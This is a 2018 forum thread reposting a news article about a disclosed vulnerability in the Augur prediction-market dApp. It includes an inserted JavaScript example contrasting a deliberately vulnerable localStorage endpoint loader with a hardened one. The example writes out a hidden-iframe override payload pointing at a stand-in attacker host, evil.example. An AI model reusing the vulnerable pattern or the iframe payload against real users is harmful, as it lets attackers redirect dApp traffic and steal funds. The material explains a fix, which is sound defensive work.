Mazda3 Posted August 9, 2018 #1

A white-hat hacker has found a serious vulnerability in Augur, the decentralized prediction market and perhaps the most widely used decentralized application (dApp) built on the Ethereum network. The bug, described on the HackerOne bug bounty platform by security researcher Vyacheslav Snezhkov, would allow an attacker to inject fraudulent data into Augur's user interface, potentially leading to a significant loss of funds for the affected users.

The exploit became possible because, while Augur's main functionality is provided by the decentralized Ethereum blockchain, the UI configuration files are stored locally on the user's computer. Consequently, hackers can run malicious websites that include hidden frames and, without the user's knowledge, change the configuration settings stored in these local files, so that Augur's user interface serves fraudulent data, potentially deceiving the user into sending funds to a hacker-controlled address.

It is important to note that the bug was not in the Augur smart contract, as was the case with the high-profile Parity and DAO incidents. However, this does not mean that the vulnerability was not serious. As Snezhkov explained: "A third-party site may include a hidden iframe that overrides the augur-node configuration variable used to run the augur application. This variable is stored in localStorage. If the browser page reloads (user action or browser/OS failure), the normal augur-node endpoint will be replaced with the one provided by the attacker, so that all data, addresses and transactions in the markets can be disguised."

After examining the vulnerability Snezhkov disclosed, namely whether it was a user interface bug or something more serious, the Forecast Foundation, which oversees development of the Augur protocol, eventually awarded the hacker $5,000.

Currently, there is no indication that the vulnerability was successfully used to steal funds. Nevertheless, the Forecast Foundation recommended that users upgrade to the latest version of the software, especially now that information about the vulnerability has become public.

Source: https://www.ccn.com/white-hat-hacker-finds-major-vulnerability-in-ethereum-dapp-augur/
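The pattern Snezhkov describes, a front-end that persists its backend endpoint in localStorage and lets a page loaded inside a hidden iframe overwrite it, shown as an added example that is not Augur's code and not part of the original post. How the override reached the Augur app is not stated on the page; the example assumes a URL query parameter, and the key name, parameter name, default endpoint and trusted-host allowlist are illustrative assumptions. The vulnerable loader sits beside a hardened one that refuses overrides when framed, validates the endpoint against an allowlist, and persists it only after explicit user confirmation. A tiny in-memory stand-in for `window.localStorage` lets it run under Node.

```javascript
// Added example (not Augur's code). Names below are assumptions for illustration.

// Minimal stand-in for window.localStorage so the example runs outside a browser.
function makeStorage() {
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
    removeItem: (k) => { m.delete(k); },
  };
}

const CONFIG_KEY = 'augur-node';                 // assumed localStorage key
const OVERRIDE_PARAM = 'augur_node';             // assumed query parameter
const DEFAULT_ENDPOINT = 'ws://127.0.0.1:9001';  // assumed default backend
const TRUSTED_HOSTS = new Set(['127.0.0.1', 'localhost']); // assumed allowlist

// Vulnerable pattern: any URL parameter silently overwrites the persisted endpoint.
// A third-party page embedding <iframe src="http://localhost:8080/?augur_node=ws://evil.example:9001">
// is enough: the app loads inside the frame, stores the attacker's endpoint, and
// every later top-level load (user reload, browser restart) talks to the attacker.
function loadConfigVulnerable(storage, pageUrl) {
  const override = new URL(pageUrl).searchParams.get(OVERRIDE_PARAM);
  if (override) storage.setItem(CONFIG_KEY, override);
  return storage.getItem(CONFIG_KEY) || DEFAULT_ENDPOINT;
}

// Only ws:// or wss:// endpoints on an allowlisted host are acceptable.
function isTrustedEndpoint(endpoint) {
  let u;
  try { u = new URL(endpoint); } catch { return false; }
  if (u.protocol !== 'ws:' && u.protocol !== 'wss:') return false;
  return TRUSTED_HOSTS.has(u.hostname);
}

// Hardened pattern:
//  1. ignore overrides when the app is framed (in a browser: window.top !== window.self),
//  2. accept only allowlisted endpoints, including the one already persisted, since an
//     older vulnerable build may have stored an attacker value,
//  3. use a valid override for this load only unless the user explicitly confirmed it.
function loadConfigHardened(storage, pageUrl, { isFramed, userConfirmed }) {
  const override = new URL(pageUrl).searchParams.get(OVERRIDE_PARAM);
  const persisted = storage.getItem(CONFIG_KEY);

  let endpoint = DEFAULT_ENDPOINT;
  if (persisted !== null) {
    if (isTrustedEndpoint(persisted)) endpoint = persisted;
    else storage.removeItem(CONFIG_KEY); // discard poisoned value
  }

  if (override && !isFramed && isTrustedEndpoint(override)) {
    endpoint = override;
    if (userConfirmed) storage.setItem(CONFIG_KEY, override);
  }
  return endpoint;
}

// Usage: simulate the attacker's hidden-iframe load followed by a normal reload.
const poisoned = makeStorage();
loadConfigVulnerable(poisoned, 'http://localhost:8080/?augur_node=ws://evil.example:9001');
console.log('vulnerable, after reload:', loadConfigVulnerable(poisoned, 'http://localhost:8080/'));

const safe = makeStorage();
loadConfigHardened(safe, 'http://localhost:8080/?augur_node=ws://evil.example:9001',
  { isFramed: true, userConfirmed: false });
console.log('hardened, after reload:', loadConfigHardened(safe, 'http://localhost:8080/',
  { isFramed: false, userConfirmed: false }));
```

The client-side framing check is a second line of defence only; a locally served dApp should also send `X-Frame-Options: DENY` or a `Content-Security-Policy: frame-ancestors 'none'` header so the browser never renders it inside a third-party page in the first place.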
Kate Posted August 9, 2018 #2

2 hours ago, Mazda3 said:

A white-hat hacker has found a serious vulnerability in Augur, the decentralized prediction market and perhaps the most widely used decentralized application (dApp) built on the Ethereum network. The bug, described on the HackerOne bug bounty platform by security researcher Vyacheslav Snezhkov, would allow an attacker to inject fraudulent data into Augur's user interface, potentially leading to a significant loss of funds for the affected users.

The exploit became possible because, while Augur's main functionality is provided by the decentralized Ethereum blockchain, the UI configuration files are stored locally on the user's computer. Consequently, hackers can run malicious websites that include hidden frames and, without the user's knowledge, change the configuration settings stored in these local files, so that Augur's user interface serves fraudulent data, potentially deceiving the user into sending funds to a hacker-controlled address.

It is important to note that the bug was not in the Augur smart contract, as was the case with the high-profile Parity and DAO incidents. However, this does not mean that the vulnerability was not serious. As Snezhkov explained: "A third-party site may include a hidden iframe that overrides the augur-node configuration variable used to run the augur application. This variable is stored in localStorage. If the browser page reloads (user action or browser/OS failure), the normal augur-node endpoint will be replaced with the one provided by the attacker, so that all data, addresses and transactions in the markets can be disguised."

After examining the vulnerability Snezhkov disclosed, namely whether it was a user interface bug or something more serious, the Forecast Foundation, which oversees development of the Augur protocol, eventually awarded the hacker $5,000.

Currently, there is no indication that the vulnerability was successfully used to steal funds. Nevertheless, the Forecast Foundation recommended that users upgrade to the latest version of the software, especially now that information about the vulnerability has become public.

Source: https://www.ccn.com/white-hat-hacker-finds-major-vulnerability-in-ethereum-dapp-augur/

Nice to hear the hacker didn't abuse the system with this.